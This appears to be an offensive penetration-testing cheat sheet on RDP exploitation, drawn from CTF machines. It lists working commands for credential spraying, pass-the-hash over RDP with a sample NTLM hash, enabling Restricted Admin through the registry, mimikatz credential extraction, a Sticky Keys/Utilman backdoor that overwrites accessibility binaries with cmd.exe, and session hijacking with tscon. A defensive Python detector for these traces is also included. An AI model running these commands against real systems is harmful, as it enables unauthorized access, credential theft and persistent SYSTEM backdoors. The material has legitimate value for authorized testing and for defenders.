
# RDP Exploitation

## Overview

Remote Desktop Protocol (RDP) on port 3389 provides graphical remote access to Windows systems. Exploitation ranges from simple authenticated access with stolen credentials to pass-the-hash via Restricted Admin mode, NLA bypass attacks, and persistence through accessibility feature backdoors. RDP sessions can also be hijacked from active users.

## Prerequisites

  • xfreerdp, rdesktop, or Remmina (Linux) / mstsc.exe (Windows)
  • Valid credentials or NTLM hash (for Restricted Admin mode)
  • Network Level Authentication (NLA) must be disabled on the target for certain attacks

## Detection & Enumeration

```bash
nmap -p 3389 --script rdp-ntlm-info <IP>                # RDP version and NLA status
nmap -p 3389 --script rdp-vuln-ms12-020 <IP>            # Check for MS12-020 (BlueKeep precursor)
netexec rdp <IP> -u <user> -p <pass>                    # Test RDP credentials
```

## Exploitation / Execution

### Standard RDP Connection

```bash
xfreerdp /v:<IP> /u:<user> /p:'<password>'              # Basic connection
xfreerdp /v:<IP> /u:<user> /p:'<password>' /dynamic-resolution  # Auto-resize
xfreerdp /v:<IP> /u:<user> /p:'<password>' /drive:share,/tmp   # Mount local /tmp as share drive
```

### NLA Bypass (When NLA is Disabled)

When NLA is disabled, the login screen is rendered before credentials are verified:

```bash
xfreerdp /v:<IP> /u:<user> /p:'<password>' -sec-nla     # Disable NLA on the client side (FreeRDP +/- toggle syntax)
```

### Restricted Admin Mode (Pass-the-Hash over RDP)

Requires the target to have Restricted Admin mode enabled (default on Server 2012 R2+). The NTLM hash is used directly without sending the plaintext password:

```bash
xfreerdp /v:<IP> /u:<user> /pth:<NTLM_hash>              # PTH over RDP
xfreerdp /v:<IP> /u:administrator /pth:d9485863c1e9e05851aa40cbb4ab9dff
```

Enable Restricted Admin (requires elevated registry access first):

```powershell
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
```

### RDP Saved Credentials Theft

If SYSTEM access is obtained, saved RDP credentials can be extracted:

```powershell
cmdkey /list                                              # List saved credentials
# Extract from registry or mimikatz
mimikatz # sekurlsa::dpapi
mimikatz # vault::cred /patch
```

### Sticky Keys / Utilman.exe Backdoor (SYSTEM required)

Replace accessibility features with cmd.exe to spawn a SYSTEM shell at the login screen (cmd.exe syntax; `copy` with `/y` overwrites without prompting):

```cmd
REM Sticky Keys (press Shift 5 times at login screen)
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe /y
REM OR Utilman (click Ease of Access at login screen)
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe /y
```

Then connect via RDP and trigger the backdoor at the login screen.

### Session Hijacking with TSCon

```powershell
query session                          # List active sessions
tscon <SESSION_ID> /dest:console       # Hijack session (requires SYSTEM)
```

## Common Pitfalls

  • Warning: With NLA enabled, the login screen is not rendered before authentication, making some visual exploitation techniques impossible
  • Warning: Restricted Admin mode requires the hash of a user in the local Administrators group or with explicit RDP permissions

## OPSEC Considerations

  • RDP logons generate Event ID 4624 with Logon Type 10
  • Sticky Keys/Utilman replacement leaves file hash mismatches and is a well-known attacker technique
  • Multiple failed RDP attempts trigger account lockout policies
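Defender-side checks for the three points above (Logon Type 10 events, accessibility-binary replacement, failed-logon bursts), as an added example that is not part of the original page. The event records and file digests are constructed inline; the accessibility list extends the page's sethc/utilman case to the other helpers launched from the logon screen.

```python
import hashlib
from collections import Counter

# Constructed sample Security-log records (not real telemetry):
# 4624 = successful logon, 4625 = failed logon, LogonType 10 = RemoteInteractive (RDP).
EVENTS = [
    {"id": 4624, "type": 10, "user": "administrator", "ip": "10.10.14.5"},
    {"id": 4624, "type": 3, "user": "svc_backup", "ip": "10.10.14.5"},
    {"id": 4625, "type": 10, "user": "bob", "ip": "10.10.14.9"},
    {"id": 4625, "type": 10, "user": "bob", "ip": "10.10.14.9"},
    {"id": 4625, "type": 10, "user": "bob", "ip": "10.10.14.9"},
    {"id": 4625, "type": 10, "user": "bob", "ip": "10.10.14.9"},
    {"id": 4625, "type": 10, "user": "bob", "ip": "10.10.14.9"},
    {"id": 4624, "type": 10, "user": "bob", "ip": "10.10.14.9"},
]


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed SHA-256 inventory of System32 binaries (hypothetical file contents).
# sethc.exe has been overwritten with cmd.exe, so the two digests are identical.
CMD_IMAGE = b"MZ-constructed-cmd-image"
SYSTEM32_HASHES = {
    "cmd.exe": sha256(CMD_IMAGE),
    "sethc.exe": sha256(CMD_IMAGE),
    "utilman.exe": sha256(b"MZ-constructed-utilman-image"),
    "osk.exe": sha256(b"MZ-constructed-osk-image"),
}

# Accessibility helpers reachable from the logon screen (standard T1546.008 watch list).
ACCESSIBILITY = ("sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                 "magnify.exe", "displayswitch.exe", "atbroker.exe")


def rdp_logons(events):
    """Successful RemoteInteractive logons (4624 / LogonType 10) as (user, source IP)."""
    return [(e["user"], e["ip"]) for e in events if e["id"] == 4624 and e["type"] == 10]


def rdp_failure_bursts(events, threshold=5):
    """Source IPs with at least `threshold` failed RDP logons (4625 / LogonType 10)."""
    counts = Counter(e["ip"] for e in events if e["id"] == 4625 and e["type"] == 10)
    return {ip: n for ip, n in counts.items() if n >= threshold}


def replaced_accessibility_binaries(hashes, accessibility=ACCESSIBILITY):
    """Accessibility helpers whose on-disk digest equals cmd.exe's: a Sticky Keys style backdoor."""
    cmd_hash = hashes["cmd.exe"]
    return sorted(name for name in accessibility if hashes.get(name) == cmd_hash)
```

On a live host the same functions can be fed `Get-FileHash` output over System32 and exported Security-log events instead of the constructed data.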

## Post-Exploitation Value

  • Full graphical desktop access for reconnaissance and tool usage
  • Drive redirection allows data exfiltration without network transfer
  • Session persistence: saved RDP credentials survive reboots

## Cross-References

### Tool References

| Tool | Link |
| --- | --- |
| xfreerdp | https://github.com/FreeRDP/FreeRDP |
| Remmina | https://remmina.org/ |

### Source Machines

  • Jeeves (Medium, Windows) - RDP for interactive access
  • Administrator (Medium, Windows) - RDP with found credentials